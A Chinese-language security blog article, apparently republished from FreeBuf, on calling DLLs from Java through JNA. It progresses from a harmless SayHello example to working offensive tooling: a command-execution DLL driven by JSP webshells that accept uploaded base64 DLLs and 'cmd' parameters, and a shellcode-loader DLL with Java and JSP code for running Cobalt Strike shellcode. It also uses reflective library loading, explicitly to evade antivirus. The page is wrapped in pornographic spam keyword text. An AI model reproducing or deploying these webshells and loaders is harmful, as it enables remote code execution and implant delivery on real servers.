精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

我們一起聊聊 JNA 調用動態鏈接庫

安全 應用安全
在學習JNA調用動態鏈接庫的時候,借鑒了很多師傅的思路,但無奈趕不上師傅們的高度,只能用稍微復雜點的辦法完善自己的代碼,來曲折得實現效果。

前言

在一次實際項目中遇到了無法調用exe可執行文件,聽說哥斯拉利用JNA技術實現了內存加載exe、執行命令等操作,特來實踐一下。

JNA 基礎知識

JNA全稱:Java Native Access,是建立在JNI(Java Native Interface)技術之上的Java開源框架,JNA提供了一組Java工具類用于在運行期間動態訪問的系統本地庫。簡單理解就是:JNA提供了一個"橋梁",可以利用Java代碼直接訪問動態鏈接庫中的函數。

調用JNI接口

調用JNI接口的步驟為:

  • 創建工程,將dll文件放到工程下
  • 引入JNA相關的jar包
  • 創建繼承自Library類的接口
  • 接口中創建對象用于加載DLL/SO的類庫
  • 接口中聲明DLL/SO類庫頭文件中暴露的方法
  • 調用該方法

編譯DLL

以windows為例,使用Visual Studio 創建一個動態鏈接庫的工程,并定義一個頭文件testdll.h和源文件testdll.cpp。簡單實現一個SayHello的方法創建testdll.cpp,作用是用來實現被聲明的函數。

#include "pch.h"
#include "testdll.h"

void SayHello()
{
    std::cout << "Hello!你成功了!" << std::endl;
}

創建testdll.h頭文件,作用是用來聲明需要導出的函數接口

#pragma once
#include <iostream>

extern "C" __declspec(dllexport) void SayHello();
//聲明一個可被調用的函數“SayHello()”,它的返回類型是void。
//extern "C"的作用是告訴編譯器將被它修飾的代碼按C語言的方式進行編譯
//__declspec(dllexport),此修飾符告訴編譯器和鏈接器被它修飾的函數或變量需要從DLL導出

而后編譯出dll。注意:要DLL位數要與JDK位數相同,否則無法調用。

image.png

導入JAR包

首先創建java工程,可以是普通項目也可以是maven功能。maven 需要導入依賴

<dependency>
  <groupId>net.java.dev.jna</groupId>
  <artifactId>jna</artifactId>
  <version>5.13.0</version>
</dependency>
<dependency>
  <groupId>net.java.dev.jna</groupId>
  <artifactId>jna-platform</artifactId>
  <version>5.13.0</version>
</dependency>

普通工程可以在 https://github.com/java-native-access/jna 下載jna jar包和platform jar包并導入。

image.png

調用DLL

我們需要繼承Library類接口,調用Native類的load方法將我們的testdll.dll加載進來并轉換為本地庫,而后聲明SayHello方法。

public interface Mydll extends Library {

    Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);
    void SayHello();
}

調用時不需要鏈接庫的后綴,會自動加上。聲明SayHello方法時,結合testdll.h頭文件,沒有返回值為void,也沒有需要的數據類型。(需要的話可查找JNA 數據類型對應關系)

image.png

然后在主方法里調用SayHello方法

public static void main(String[] args) {
    Mydll.mydll.SayHello();
}

image.png

可以看到成功調用了testdll.dll的SayHello方法。

加載動態鏈接庫

在上面的代碼中,我們直接利用Native.load將dll轉換為本地庫,在此之前缺少了加載這一步。常見的加載動態鏈接庫有三種方法:

  • System.load / System.loadLibrary
  • Runtime.getRuntime().load / Runtime.getRuntime().loadLibrary
  • com.sun.glass.utils.NativeLibLoader.loadLibrary

在使用時也有一些區別:load接收的是系統的絕對路徑,loadLibrary接收的是相對路徑。但實際利用過程中肯定是絕對路徑優先于相對路徑。以Runtime.getRuntime().load為例:

image.png

但實際利用可能會被安全軟件捕捉。我們反射調用loadLibrary方法。代碼來自Java加載動態鏈接庫這篇文章

try {
    Class clazz = Class.forName("java.lang.ClassLoader");
    java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
    method.setAccessible(true);
    method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true);
    Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);
    mydll.SayHello();
}catch (Exception e){
    e.printStackTrace();
}

場景利用

現在我們想一下具體場景的利用,在此基礎上調整我們的代碼。

webshell

既然jna加載動態鏈接庫后轉換為本地庫,可以調用dll的任意方法,那實現一個命令執行應該也是可以的。

#include "pch.h"
#include "command.h"

#include <cstdlib>
#include <string>

void executeCommand(const char* command) {
    char psBuffer[128];
    FILE* pPipe;

    if ((pPipe = _popen(command, "r")) == NULL)
    {
        exit(1);
    }

    while (fgets(psBuffer, 128, pPipe))
    {
        puts(psBuffer);
    }

    int endOfFileVal = feof(pPipe);
    int closeReturnVal = _pclose(pPipe);

    if (endOfFileVal)
    {
        printf("\nProcess returned %d\n", closeReturnVal);
    }
    else
    {
        printf("Error: Failed to read the pipe to the end.\n");
    }
}

相應的頭文件

#pragma once
#include <iostream>

extern "C" __declspec(dllexport) void executeCommand(const char* command);

java代碼加載并調用。

import com.sun.jna.Library;
import com.sun.jna.Native;

public class test {

	public interface Mydll extends Library {
        void executeCommand(String command);
    }
    public static void main(String[] args) {
    	try {
            Class clazz = Class.forName("java.lang.ClassLoader");
            java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
            method.setAccessible(true);
            method.invoke(null, clazz, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll", true);
            Mydll mydll = (Mydll)Native.load("testdll",Mydll.class);
            mydll.executeCommand("ipconfig");
    	}catch (Exception e){
            e.printStackTrace();
        }

    }

}

image.png

成功實現。結合實際利用我們還需要優化一下代碼,改成jsp腳本文件。因為com.sun.jna包是第三方包,在實際利用肯定沒有。所以這里選擇將自己寫的代碼和jna.jar一塊用maven打包為maven02-1.0-SNAPSHOT-jar-with-dependencies.jar試試。

image.png

再把test類名修改為show,把dll動態鏈接庫和將要執行的命令作為參數傳遞進去?,F在還差一個加載外部的jar包并調用方法的jsp腳本文件。

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLClassLoader" %>


<%
    String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";
    URLClassLoader urlClassLoader =null;
    Class<?> MyTest = null;
    //通過URLClassLoader加載外部jar
    urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});
    //獲取外部jar里面的具體類對象
    MyTest = urlClassLoader.loadClass("com.jna.jnatest");
    //創建對象實例
    Object instance = MyTest.newInstance();
    //獲取實例當中的方法名為show
    Method method = MyTest.getMethod("show", String.class,String.class);
    //傳入實例以及方法參數信息執行這個方法
    Object ada = method.invoke(instance, "C:\\Users\\cseroad\\source\\repos\\testdll\\x64\\Release\\testdll.dll","whoami");
%>

這樣用的時候需要向目標服務器手動上傳兩個文件,jar包和dll文件。我們再進一步優化一下。

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.net.URL" %>

<%!

    private String getFileName(){
        String fileName = "";
        java.util.Random random = new java.util.Random(System.currentTimeMillis());
        String os = System.getProperty("os.name").toLowerCase();
        if (os.contains("windows")){
            fileName = "C:\\Windows\\Temp\\" + random.nextInt(10000000) + ".dll";
        }else {
            fileName = "/tmp/"+ random.nextInt(10000000) + ".so";
        }
        return fileName;
    }


    public String UploadBase64DLL(String base64) throws Exception {
        sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder();
        java.io.File file = new java.io.File(getFileName());
        java.io.FileOutputStream fos = new java.io.FileOutputStream(file);
        fos.write(b.decodeBuffer(base64));
        fos.close();
        return file.getAbsolutePath();
    }
%>
<%
    try{
        String cmd = request.getParameter("cmd");
        String base64 = request.getParameter("base64");
        String file =  UploadBase64DLL(base64);
        String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";
        //通過URLClassLoader加載外部jar
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});
        //獲取外部jar里面的具體類對象
        Class<?> MyTest = urlClassLoader.loadClass("com.jna.jnatest");
        //創建對象實例
        Object instance = MyTest.newInstance();
        //獲取實例當中的方法名為show,參數只有一個且類型為string的public方法
        Method method = MyTest.getMethod("show", String.class,String.class);
        //傳入實例以及方法參數信息執行這個方法
        Object ada = method.invoke(instance, file,cmd);


    }
    catch (Exception e){
        out.println(e);
    }

%>

現在只需要手動上傳一個jar包就可以,dll通過base64編碼上傳上去。這樣參數值就是base64編碼之后的dll和cmd要執行的系統命令。

image.png

唯一的缺點就是不能在前端顯示,或許將代碼加入到冰蝎可以實現?

shellcode

既然前端無法獲取結果,那直接加載shellcode上線cs呢?我們利用同樣的方式寫出加載shellcode的代碼。shellcode.cpp

#include "shellcode.h"
#include <iostream>


using namespace std;

void shellcode(PCHAR code, DWORD buf_len) {

    cout << buf_len << endl;
    DWORD oldprotect = 0;
    LPVOID  base_addr = NULL;
    //  申請一塊buf_len長度大小的空間,RW權限,不要開rwx,PAGE_EXECUTE_READWRITE 
    base_addr = VirtualAlloc(0, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // 復制shellcode到新的空間,這個函數比較罕見,用memcpy也可以呀
    unsigned char HexNumArray[4096];
    int num = HexStr2HexNum(code, buf_len, HexNumArray);
    RtlMoveMemory(base_addr, HexNumArray, buf_len);
    // 修改為執行RX權限
    VirtualProtect(base_addr, buf_len, PAGE_EXECUTE_READ, &oldprotect);
    cout << "starting spawn shellcode" << endl;
    // 當前進程創建線程執行shellcode
    auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0);
    // 等待線程返回值
    WaitForSingleObject(ct, -1);
    // 釋放內存
    free(base_addr);
}

int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray)
{
    int j = 0;
    for (int i = 0; i < len; i += 2)
    {
        if (HexStrArray[i] == 0x5C || HexStrArray[i] == 0x58 || HexStrArray[i] == 0x78)
        {
            continue;
        }
        char HIGH_BYTE = 0;
        char LOW_BYTE = 0;
        //high 4
        if (HexStrArray[i] >= 0x30 && HexStrArray[i] <= 0x3A)
        {
            HIGH_BYTE = HexStrArray[i] - 0x30;
        }
        else if (HexStrArray[i] >= 0x41 && HexStrArray[i] <= 0x47)
        {
            HIGH_BYTE = HexStrArray[i] - 0x37;
        }
        else if (HexStrArray[i] >= 0x61 && HexStrArray[i] <= 0x67)
        {
            HIGH_BYTE = HexStrArray[i] - 0x57;
        }
        else
        {
            printf("Please make sure the format of Hex String is correct!\r\n");
            printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i);
            return -1;
        }

        //low 4
        if (HexStrArray[i + 1] >= 0x30 && HexStrArray[i + 1] <= 0x3A)
        {
            LOW_BYTE = HexStrArray[i + 1] - 0x30;
        }
        else if (HexStrArray[i + 1] >= 0x41 && HexStrArray[i + 1] <= 0x47)
        {
            LOW_BYTE = HexStrArray[i + 1] - 0x37;
        }
        else if (HexStrArray[i + 1] >= 0x61 && HexStrArray[i + 1] <= 0x67)
        {
            LOW_BYTE = HexStrArray[i + 1] - 0x57;
        }
        else
        {
            printf("Please make sure the format of Hex String is correct!\r\n");
            printf("The wrong char is \"%c\", and its number is % d\r\n", HexStrArray[i], i);
            return -1;
        }

        HexNumArray[j] &= 0x0F;
        HexNumArray[j] |= (HIGH_BYTE << 4);
        HexNumArray[j] &= 0xF0;
        HexNumArray[j] |= LOW_BYTE;
        j++;
    }
    return 0;
}

shellcode.h

#pragma once
#include <Windows.h>


extern "C" __declspec(dllexport) BOOL shellcode(PCHAR code, DWORD size);
int HexStr2HexNum(char* HexStrArray, int len, unsigned char* HexNumArray);

在java里加載并調用,傳入shellcode和長度。以達到更好的免殺性。

import java.util.Base64;
import com.sun.jna.Library;
import com.sun.jna.Native;


public class test {

	public interface Mydll extends Library {
        void shellcode(byte[] b,int length);
    }

    public static void show(String base64,String dllpath,String dllname) {
        try {
            Class clazz = Class.forName("java.lang.ClassLoader");
            java.lang.reflect.Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
            method.setAccessible(true);
            method.invoke(null, clazz, dllpath, true);
            Mydll mydll = (Mydll)Native.load(dllname,Mydll.class);
            byte[] base64decodedBytes = java.util.Base64.getDecoder().decode(base64);
            int leng = base64decodedBytes.length;
            mydll.shellcode(base64decodedBytes,leng);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
	
	public static void main(String[] args) {
		String base64encodedString = "XHhmY1x4NDhxxxxxxxxxxxxxxx";
		show(base64encodedString,"C:\\Windows\\Temp\\jna.dll","jna");
    }
}

此時只需要將shellcode值base64編碼當做字符傳遞即可。測試一下

image.png

可以看到正常上線,進程為javaw.exe。那在實際環境中同樣不能這樣利用。依舊把java代碼打包為jar包,再修改一下jsp腳本文件應該就可以在實際運行了。

<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.net.URL" %>

<%!

    private String getFileName(String dllname){
        String fileName = "";
        String os = System.getProperty("os.name").toLowerCase();
        if (os.contains("windows")){
            fileName = "C:\\Windows\\Temp\\" + dllname + ".dll";
        }else {
            fileName = "/tmp/"+ dllname + ".so";
        }
        return fileName;
    }


    public String UploadBase64DLL(String base64,String dllname) throws Exception {
        sun.misc.BASE64Decoder b = new sun.misc.BASE64Decoder();
        java.io.File file = new java.io.File(getFileName(dllname));
        java.io.FileOutputStream fos = new java.io.FileOutputStream(file);
        fos.write(b.decodeBuffer(base64));
        fos.close();
        return file.getAbsolutePath();
    }
%>
<%
    try{

        String shellcode = request.getParameter("shellcode");
        String base64dll = request.getParameter("base64dll");
        String dllname = request.getParameter("dllname");
        String pathdll = UploadBase64DLL(base64dll,dllname);
        String path = "file:E:\\apache-tomcat-7.0.107\\webapps\\test\\maven02-1.0-SNAPSHOT-jar-with-dependencies.jar";
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL(path)});
        Class<?> MyTest = urlClassLoader.loadClass("com.jna.jnatest");
        Object instance = MyTest.newInstance();
        Method method = MyTest.getMethod("show", String.class,String.class,String.class);
        Object ada = method.invoke(instance,shellcode, pathdll,dllname);

    }
    catch (Exception e){
        out.println(e);
    }

%>

以tomcat為例,shellcode 即將cobaltstrike的shellcode進行base64編碼,base64dll 是base64編碼dll動態鏈接庫之后的值,dllname即是dll動態鏈接庫的名稱。測試可以正常上線執行命令。上線進程為java.exe。

image.png

總結

在學習JNA調用動態鏈接庫的時候,借鑒了很多師傅的思路,但無奈趕不上師傅們的高度,只能用稍微復雜點的辦法完善自己的代碼,來曲折得實現效果。

參考資料

https://www.bilibili.com/video/BV16t411A7it/?spm_id_from=333.337.search-card.all.click&vd_source=0627d2723fb97773126096556cc98e0dhttps://www.cnblogs.com/happyhuangjinjin/p/17219986.htmlhttps://tttang.com/archive/1436/https://payloads.online/archivers/2022-08-11/1/

本文作者:CSeroad, 轉載請注明來自FreeBuf.COM

責任編輯:武曉燕 來源: FreeBuf.COM
相關推薦

2025-01-07 09:07:36

接口屬性路徑

2024-12-10 00:00:25

2025-02-28 08:46:24

框架微服務架構

2023-06-30 08:18:51

敏捷開發模式

2023-08-10 08:28:46

網絡編程通信

2023-08-04 08:20:56

DockerfileDocker工具

2022-05-24 08:21:16

數據安全API

2023-09-10 21:42:31

2024-02-20 21:34:16

循環GolangGo

2021-08-27 07:06:10

IOJava抽象

2022-12-05 09:10:21

2023-07-04 08:06:40

數據庫容器公有云

2024-07-26 09:47:28

2022-10-08 00:00:05

SQL機制結構

2022-02-23 08:41:58

NATIPv4IPv6

2022-09-22 08:06:29

計算機平板微信

2024-11-28 09:57:50

C#事件發布器

2021-08-12 07:49:24

mysql

2023-07-24 09:41:08

自動駕駛技術交通

2023-03-26 23:47:32

Go內存模型
點贊
收藏

51CTO技術棧公眾號

国产在线免费视频| 少妇熟女视频一区二区三区| 国产51人人成人人人人爽色哟哟 | 久久天天躁狠狠躁夜夜躁| 精产国品一区二区三区| 黄色在线观看www| 欧美激情一区二区在线| 91麻豆精品秘密入口| 日本污视频在线观看| 欧美色图激情小说| 亚洲丁香婷深爱综合| 婷婷激情四射五月天| 天堂8中文在线| 国产亚洲综合在线| 国产二区一区| 日批视频免费观看| 亚洲大胆在线| 精品国内产的精品视频在线观看| 波多野结衣有码| 亚洲免费一区| 日韩欧亚中文在线| 国产黄色激情视频| 91伦理视频在线观看| 成人av午夜影院| 成人国产精品一区二区| 在线视频一区二区三区四区| 欧美国产精品| 自拍偷拍亚洲在线| 精品人妻一区二区三区视频| 亚洲精品不卡在线观看| 欧美日精品一区视频| 精品一卡二卡三卡| rebdb初裸写真在线观看| 国产精品理论片| 欧美日韩在线播放一区二区| 二区三区在线视频| 精品一区二区在线看| 国产裸体写真av一区二区 | 麻豆91精品| 久久露脸国产精品| 欧美黄色免费在线观看| 99热国内精品| 中文字幕日韩视频| 色综合99久久久无码国产精品| 国产精品中文字幕制服诱惑| 日韩午夜中文字幕| 日日夜夜精品视频免费观看| 欧美一级在线| 精品视频在线视频| 香蕉视频网站入口| 草莓视频成人appios| 日本丶国产丶欧美色综合| 噜噜噜久久亚洲精品国产品麻豆| 91桃色在线| 亚洲电影激情视频网站| 日韩极品视频在线观看| 国内高清免费在线视频| 亚洲一线二线三线视频| 日本中文字幕在线视频观看| 电影k8一区二区三区久久 | 国产劲爆久久| 亚洲电影在线看| 国产熟女高潮一区二区三区| 久久香蕉网站| 亚洲精品一二区| 国产综合精品在线| 日韩精品dvd| 久久精品视频在线播放| 国产精品一区二区亚洲| 久久久久免费av| 欧美成人精品激情在线观看| 久久9999久久免费精品国产| 亚洲成人资源| 国产aaa精品| 亚洲一区二区影视| 国产一区二区在线视频| 国产福利久久精品| 涩涩视频在线观看免费| 日本一区二区三区国色天香| 亚洲一区二区不卡视频| www国产在线观看| 亚洲18色成人| 欧美三级理论片| va天堂va亚洲va影视| 精品国内片67194| 国产又黄又粗又猛又爽的视频| 亚洲电影男人天堂| 这里只有精品在线播放| 亚洲二区在线播放| 亚洲人成毛片在线播放女女| 国产精品99久久久久久人 | 99精品视频在线观看| 欧美日韩国产综合视频在线| 888av在线| 亚洲一区二区三区四区在线| 白嫩少妇丰满一区二区| 欧美黄视频在线观看| 亚洲黄色在线看| 免费看的黄色网| 欧美久久视频| 国产精品久久久久久久av电影| 国产喷水吹潮视频www| 91香蕉视频污| 公共露出暴露狂另类av| 麻豆mv在线看| 91精品国产综合久久久久久久久久 | 欧美一区二区三区播放老司机| 中文字幕第九页| 日韩精品欧美激情一区二区| 久久免费福利视频| 国产伦理吴梦梦伦理| 久久蜜桃一区二区| www.亚洲视频.com| 日本免费成人| 亚洲天堂av综合网| 日本午夜小视频| 国产在线视频一区二区| 免费亚洲一区二区| 国产美女情趣调教h一区二区| 欧美日韩综合在线免费观看| 人妻无码一区二区三区| 欧美在线亚洲| 国产精品爽爽ⅴa在线观看| 午夜视频免费在线| 一区二区三区免费网站| 自拍偷拍21p| 久久91麻豆精品一区| 97视频在线观看亚洲| 国产av无码专区亚洲av麻豆| 日本一区二区三区高清不卡| 国产亚洲天堂网| 99re8这里有精品热视频8在线 | 欧美日韩在线精品| sis001亚洲原创区| 日韩精品一区在线| 日本午夜在线观看| 麻豆国产精品视频| 视频在线99| 日韩高清成人| 国产亚洲aⅴaaaaaa毛片| 亚洲精品中文字幕乱码三区91| 成人一区二区三区| 久久www视频| 在线精品国产亚洲| 久99久在线视频| 精品人妻无码一区二区| 亚洲综合成人网| 国产xxx在线观看| 欧美三级特黄| 国产精品国产一区二区 | 一本一本久久a久久综合精品| 国产精品视频yy9099| 精品无人乱码| 欧美在线观看一区二区| 久久久久久成人网| 久久69国产一区二区蜜臀| 亚洲激情电影在线| 日韩三区四区| 久久久av电影| www.五月激情| 亚欧色一区w666天堂| 国产熟女高潮一区二区三区| 欧美一区=区| 色噜噜狠狠色综合网| 欧美黄色成人| 麻豆乱码国产一区二区三区 | 国产一区二区精品调教| 尤物精品国产第一福利三区| 亚洲最大成人av| 亚洲摸摸操操av| 在线观看一区二区三区四区| 亚洲国产清纯| 欧美日韩一区二区三区在线视频| 成人国产精品| 久久av中文字幕| 国产 日韩 欧美 综合| 精品久久久久久久久久| 亚洲精品国产一区黑色丝袜 | 国产在线久久久| 久久亚洲资源| 亚洲人成在线观| 91亚洲国产成人精品一区| 亚洲综合图片区| 草草地址线路①屁屁影院成人| 视频一区视频二区中文字幕| 亚洲午夜精品久久久中文影院av| 日本综合精品一区| 51色欧美片视频在线观看| 国产高清免费在线播放| 日韩精品一区二区三区老鸭窝| 国产女同在线观看| 国产精品五月天| 国产麻豆剧传媒精品国产av| 日韩电影在线免费| 欧美在线观看视频免费| av一区二区在线播放| 91麻豆国产语对白在线观看| 免费一二一二在线视频| 日韩在线资源网| 六月婷婷综合网| 欧美揉bbbbb揉bbbbb| 日本熟妇一区二区| √…a在线天堂一区| 黄色a一级视频| 国产99久久久精品| 在线免费视频一区| 中文精品视频| 六月婷婷激情网| 国产精品手机在线播放| 国产精品久久久久av福利动漫| 日本一区二区电影| 性视频1819p久久| 国产精品刘玥久久一区| 亚洲小视频在线观看| 欧美 日韩 国产 成人 在线 91| 欧美视频一区在线观看| 圆产精品久久久久久久久久久| 亚洲视频一区二区在线| 免费成人深夜天涯网站| aaa亚洲精品一二三区| 日本泡妞xxxx免费视频软件| 人禽交欧美网站| 黄色片视频在线播放| 亚洲激情网址| 日本一级黄视频| 自拍视频亚洲| 在线一区日本视频| 人人狠狠综合久久亚洲婷| 久久久久无码国产精品一区| 成人在线视频你懂的| 亚洲一区亚洲二区| 色8久久久久| 国产精品三级美女白浆呻吟| 中文日产幕无线码一区二区| 久久人人97超碰精品888 | 亚洲综合一二三区| 日韩成人毛片视频| 亚洲欧美综合色| 任我爽在线视频| 国产精品乱码一区二区三区软件| 欧美多人猛交狂配| 久久久久久97三级| 五级黄高潮片90分钟视频| av一区二区三区| 第四色在线视频| 99国产精品国产精品毛片| 国产一级伦理片| 97se狠狠狠综合亚洲狠狠| av无码一区二区三区| 93久久精品日日躁夜夜躁欧美| 美女又黄又免费的视频| 高清不卡一二三区| 你懂的在线观看网站| av不卡免费在线观看| 我和岳m愉情xxxⅹ视频| 久久久久99精品一区| 91在线无精精品白丝| 国产婷婷一区二区| 欧美巨胸大乳hitomi| 国产精品乱人伦| 欧美三级小视频| 亚洲国产成人porn| 在线观看日韩中文字幕| 在线亚洲免费视频| 91无套直看片红桃| 精品国产成人在线影院| 三级av在线| 中文字幕欧美日韩精品| 国产一二三区在线观看| 欧美国产日韩一区二区三区| sm在线观看| 国产成人精品视频在线观看| 久久三级毛片| 官网99热精品| 久久99免费视频| 天天在线免费视频| 在线成人欧美| 三级在线视频观看| 国产精品99久久久久久久女警| www.17c.com喷水少妇| 国产亚洲欧美日韩日本| 色欲一区二区三区精品a片| 亚洲第一av色| 老熟妇一区二区三区啪啪| 91精品国产色综合久久不卡蜜臀| 免费看黄网站在线观看| 在线视频精品一| 欧美xxxx视频| 国产91在线播放| 香蕉大人久久国产成人av| 久久久久久艹| 91成人免费| 成人免费在线小视频| 精东粉嫩av免费一区二区三区| 国产性猛交96| 国产精品久久久久国产精品日日| 国产一级视频在线观看| 在线观看日韩精品| 欧美一区,二区| 日韩一二三在线视频播| 中文字幕在线免费观看视频| 亚洲va欧美va国产综合久久| 亚瑟一区二区三区四区| 超碰10000| 日韩高清不卡一区二区三区| 日本高清一区二区视频| 久久九九久久九九| 国产成人免费在线观看视频| 狠狠躁18三区二区一区| 国产99视频在线| 在线a欧美视频| 久久影院午夜精品| 2022国产精品| 日韩在线不卡| 久久网站免费视频| 成人在线综合网站| 亚洲不卡在线播放| 欧美色中文字幕| 天堂中文在线资源| 欧美大片免费看| 精品国产一区二区三区2021| 欧洲精品一区色| 国产欧美日韩亚洲一区二区三区| 麻豆网站免费观看| 国产精品久久99| 国产精华7777777| 国产视频一区在线| 国产传媒av在线| 97久草视频| 伊人色**天天综合婷婷| av中文字幕网址| 国产欧美一区二区在线观看| 国产免费观看av| 日韩高清av一区二区三区| 欧美人与动牲性行为| 亚洲va欧美va国产综合剧情 | 国产一线二线三线女| 国产美女一区二区三区| 日本二区三区视频| 欧美日韩精品一区二区三区 | 91高清在线免费观看| 66精品视频在线观看| 日韩精品手机在线观看| 国产在线观看一区二区| 91麻豆免费视频网站| 9191久久久久久久久久久| 调教视频免费在线观看| 国产精品美女免费看| 青青一区二区三区| 在线看的黄色网址| 国产精品美日韩| 国产精品伦一区二区三区| 久久夜精品va视频免费观看| av在线精品| www.男人天堂网| 成人动漫中文字幕| 日本在线播放视频| 亚洲欧美国产另类| 韩日精品一区| 久久久一二三四| 国产精品一区二区无线| 精品在线免费观看视频| 日韩精品中文字幕在线观看| 中文在线аv在线| 日韩精品另类天天更新| 麻豆精品久久久| 九九视频在线观看| 精品视频一区在线视频| 成人精品电影在线| 一本色道久久综合亚洲精品婷婷 | 无码人妻精品一区二区三区温州| 欧美色另类天堂2015| 国产女主播在线写真| 成人欧美一区二区三区黑人孕妇| 欧美日韩综合| 中文字幕在线看高清电影| 欧美系列在线观看| 国产乱色在线观看| 国产一区二区三区免费不卡| 久久亚洲二区| 久草视频手机在线| 日韩毛片在线看| 亚洲男人在线| 69堂免费视频| 中文字幕在线播放不卡一区| 刘亦菲久久免费一区二区| 国产97人人超碰caoprom| 婷婷激情图片久久| 亚洲av无码一区二区三区网址| 欧美无乱码久久久免费午夜一区 | 久久人体视频| 在线xxxxx| 欧美日韩午夜影院| zzzwww在线看片免费| 亚洲一区在线直播| 91丨九色丨黑人外教| 国产女同91疯狂高潮互磨| 日韩av色综合| 激情91久久| 亚洲色偷偷综合亚洲av伊人|